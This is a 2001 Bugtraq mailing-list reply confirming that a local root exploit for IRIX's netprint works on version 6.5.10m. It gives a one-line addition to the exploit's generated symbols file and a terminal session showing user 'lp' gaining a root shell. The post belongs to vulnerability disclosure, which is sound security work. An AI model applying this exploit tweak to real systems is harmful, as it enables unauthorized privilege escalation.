[20502] in bugtraq
Re: IRIX /usr/lib/print/netprint local root symbols exploit.
daemon@ATHENA.MIT.EDU (Thomas-Martin Kruel)
Sat Apr 28 17:54:12 2001
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Message-ID: <3AEB0DCE.19919.3B5170@localhost>
Date: Sat, 28 Apr 2001 18:37:02 +0200
Reply-To: kruel@mbi-berlin.de
From: Thomas-Martin Kruel <kruel@mbi-berlin.de>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <20010428060001.4E85424CA26@lists.securityfocus.com>
I tested against 6.5.10m and it works.
just add
fprintf(symbol,"void ListAllPrinters(){}\n");
to the list of symbols and execute the xploit as user "lp":
% whoami
lp
% ./xnetprint /bin/sh
[(IRIX)netprint[] local root exploit, by: v9[v9@realhalo.org]. ]
[*] making symbols source file for netprint to execute.
[*] done, now compiling symbols source file.
[*] done, now checking to see if the symbols source compiled.
[*] done, now executing netprint.
[*] success, uid: 0, euid: 0, gid: 0, egid: 0.
# whoami
root
The "lp" account, however, is no longer left open by default since 6.5, AFAIK.
Thomas.
---
Max-Born-Institut fuer Nichtlineare Optik und Kurzzeitspektroskopie
Max-Born-Strasse 2A, D-12489 Berlin, Germany
Leiter EDV - Thomas-Martin Kruel
mailto: kruel@mbi-berlin.de Tel. 030 / 6392-1540, Fax: -1509, Funk: 0170 / 9247486
Support: http://www.mbi-berlin.de/edv
mailto: support@mbi-berlin.de Tel. 030 / 6392-1555, Pager: alarm@mbi-berlin.de
